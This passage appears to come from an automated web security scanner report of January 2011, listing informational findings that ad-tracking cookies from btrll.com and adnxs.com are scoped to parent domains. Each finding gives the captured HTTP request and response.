P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:05 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.13. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:14:07 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:07 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: GHP=AAAHkk03fk8FoA; expires=Mon, 21-Mar-2011 00:14:07 GMT; path=/; domain=.btrll.com
Location: http://b.scorecardresearch.com/p?c1=1&c2=6000006&c3=&c4=&c5=010000&c6=2903&c10=&cA1=8&cA2=6000006&cA3=3844555&cA4=1938&cA5=393&cA6=2903&cA10=2286&cv=1.7&cj=&rn=1295482442&r=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-cb6C0zFF7dWjI.gif%3Flabels%3Dp.2903.3844555.0%2Ca.393.1938.2286%2Cu.pre.0x0%3Bmedia%3Dad%3Br%3D1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.14. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:04 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:04 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: GHP=AAAHkk03fk8FoAAZ; expires=Mon, 21-Mar-2011 00:40:04 GMT; path=/; domain=.btrll.com
Location: http://b.scorecardresearch.com/p?c1=1&c2=6000006&c3=&c4=&c5=010000&c6=2903&c10=&cA1=8&cA2=6000006&cA3=3844555&cA4=1938&cA5=393&cA6=2903&cA10=2286&cv=1.7&cj=&rn=1295482442&r=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-cb6C0zFF7dWjI.gif%3Flabels%3Dp.2903.3844555.0%2Ca.393.1938.2286%2Cu.pre.0x0%3Bmedia%3Dad%3Br%3D1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.15. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:14:22 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:22 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.16. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]]

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:04 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:04 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/mid;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.17. http://ib.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11d765b6a10b1b3&seg_code=cm.cm_aa_gn1,cm.weath_l&ord=1295482372 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTdEnffCdHa[IfI1^wzHPZ2[uFgkr]/35(zkfLWZZy77B(fakx9WCYA*.cx3xndWdV[eGG4Y!<mnI+C=f?; path=/; expires=Wed, 20-Apr-2011 00:13:36 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 20 Jan 2011 00:13:36 GMT

GIF89a.............!.......,........@..L..;

7.18. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf; path=/; expires=Wed, 20-Apr-2011 00:12:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:12:52 GMT
Content-Length: 402

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=c
...[SNIP]...

7.19. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-69155988_1295482815%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D777061%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D1768089178%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
